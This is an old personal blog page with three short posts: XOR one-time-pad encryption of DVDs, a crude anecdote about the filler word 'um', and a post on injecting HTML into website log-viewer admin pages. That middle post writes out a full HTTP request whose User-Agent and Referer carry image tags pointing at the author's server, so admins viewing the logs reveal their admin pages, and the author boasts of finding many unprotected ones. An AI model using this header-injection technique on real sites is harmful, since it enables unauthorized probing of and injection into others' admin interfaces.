Log in

No account? Create an account
Sarah's Blog [entries|archive|friends|userinfo]

[ userinfo | livejournal userinfo ]
[ archive | journal archive ]

October 4th, 2009

How to secure secret files completely on DVD's. [Oct. 4th, 2009|07:34 am]
Have a random-key disk burnt. Just a disk of random data recorded on it.

Then when you burn your important disk - XOR the data with the random data on the other disk.

Both disks will look random. Post one, and take the other with you.

You can be safe knowing if either disk is stolen, it will be entirely unreadable, and uncrackable (if truly random).
linkpost comment

Who's watching your surfing? [Oct. 4th, 2009|07:45 am]
I've found internet based admin pages for viewing visitor page request logs seldom filter out HTML, as the data is coming from log files... so how would HTML get in there!?

Well, if you change the request header your browser sends out using a suitable program, like the Proxomitron, you can inject HTML into the pages that are displaying the logs.

Here's the basic version of a suitable Internet GET header request, containing embed HTML in pink:

Host: regmedia.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv: Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)<img src=http://myserver.com/funnyPic1.jpg>
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Referer: http://www.theregister.co.uk/2009/09/30/ge_holography/<img src=http://myserver.com/funnyPic2.jpg>
If-Modified-Since: Wed, 30 Sep 2009 10:57:53 GMT
If-None-Match: "6b85-474c9670d0e40"

Now, if this data is ever displayed in an admins browser - your server logs will record the image hit, and the page it came from. =)

I've found many unprotected admin pages like this...
linkpost comment

Filled pauses. [Oct. 4th, 2009|01:26 pm]
A friend of mine from Turkey (met in college) told me one day the first or second year I knew him that "um" is slang over there for a woman's vagina. Though he learned English incredibly well, as do many people there, they don't fill in pauses with 'um' as we do. They use 'uh.' It was a shock for him when he first got here. Everyone here from young children to old folks was saying essentially 'pussy,' or even 'cun*' all day long as part of their normal speech.


linkpost comment

[ viewing | October 4th, 2009 ]
[ go | Previous Day|Next Day ]